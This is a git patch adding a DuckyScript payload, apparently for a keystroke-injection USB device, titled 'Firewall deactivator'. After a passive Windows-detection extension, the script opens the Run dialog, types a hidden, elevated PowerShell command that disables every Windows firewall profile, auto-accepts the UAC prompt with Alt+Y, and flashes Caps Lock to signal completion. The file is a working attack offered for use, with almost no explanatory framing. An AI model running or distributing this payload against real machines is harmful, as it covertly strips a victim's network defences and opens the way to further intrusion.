From 261e82a82925f13bb46bf8bbec6ae4cc137eedf6 Mon Sep 17 00:00:00 2001
From: Luu <112649910+luu176@users.noreply.github.com>
Date: Mon, 4 Nov 2024 13:00:31 +0100
Subject: [PATCH] Create payload.txt

---
 .../Firewall_Deactivator/payload.txt          | 61 +++++++++++++++++++
 1 file changed, 61 insertions(+)
 create mode 100644 payloads/library/execution/Firewall_Deactivator/payload.txt

diff --git a/payloads/library/execution/Firewall_Deactivator/payload.txt b/payloads/library/execution/Firewall_Deactivator/payload.txt
new file mode 100644
index 0000000..515c99a
--- /dev/null
+++ b/payloads/library/execution/Firewall_Deactivator/payload.txt
@@ -0,0 +1,61 @@
+REM Title:        Firewall deactivator
+REM Author:       luu176
+REM Description:  Deactivate all firewalls in windows machine using hidden powershell
+REM Target:       Windows
+
+EXTENSION PASSIVE_WINDOWS_DETECT
+    REM VERSION 1.1
+    REM AUTHOR: Korben
+
+    REM_BLOCK DOCUMENTATION
+        Windows fully passive OS Detection and passive Detect Ready
+        Includes its own passive detect ready.
+        Does not require additional extensions.
+
+        USAGE:
+            Extension runs inline (here)
+            Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+            boot delay
+            $_OS will be set to WINDOWS or NOT_WINDOWS
+            See end of payload for usage within payload
+    END_REM
+
+    REM CONFIGURATION:
+    DEFINE #MAX_WAIT 150
+    DEFINE #CHECK_INTERVAL 20
+    DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
+    DEFINE #NOT_WINDOWS 7
+
+    $_OS = #NOT_WINDOWS
+
+    VAR $MAX_TRIES = #MAX_WAIT
+    WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
+        DELAY #CHECK_INTERVAL
+        $MAX_TRIES = ($MAX_TRIES - 1)
+    END_WHILE
+    IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
+        $_OS = WINDOWS
+    END_IF
+
+    REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
+        IF ($_OS == WINDOWS) THEN
+            STRING HELLO WINDOWS!
+        ELSE
+            STRING HELLO WORLD!
+        END_IF
+    END_REM
+END_EXTENSION
+
+GUI r
+DELAY 200
+STRINGLN powershell -Command "Start-Process powershell -ArgumentList '-Command Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False' -Verb RunAs -WindowStyle Hidden"
+DELAY 800
+ALT y
+SAVE_HOST_KEYBOARD_LOCK_STATE
+VAR $i = 0
+WHILE ( $i < 9 )
+    DELAY 150
+    CAPSLOCK
+    $i = ( $i + 1 )
+END_WHILE
+RESTORE_HOST_KEYBOARD_LOCK_STATE